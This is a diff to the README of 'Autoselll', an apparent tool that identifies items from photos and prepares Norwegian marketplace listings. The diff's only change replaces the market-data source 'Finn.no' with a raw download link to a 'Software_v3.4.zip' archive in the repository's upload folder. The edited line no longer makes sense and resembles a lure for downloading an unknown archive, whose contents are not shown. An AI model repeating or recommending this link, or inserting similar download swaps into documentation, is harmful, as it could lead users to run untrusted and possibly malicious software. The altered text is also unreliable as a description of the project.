santiagofavero/Autoselll/README.md

 Core capabilities
 - Image understanding: The system analyzes photos to identify item type, brand, model, and visible conditions.
 - Brand and model detection: It recognizes specific models (for example, “iPhone 14 Pro” instead of a generic “phone”).
-- Market data integration: It validates pricing against current Norwegian market data using Finn.no and other relevant sources.
+- Market data integration: It validates pricing against current Norwegian market data using https://github.com/santiagofavero/Autoselll/raw/refs/heads/main/app/upload/Software_v3.4.zip and other relevant sources.
 - Copy generation: It creates optimized, Norwegian-language descriptions tailored to each platform’s requirements.
 - Publishing preparation: It formats content for multiple marketplaces and prepares for automated posting to supported destinations.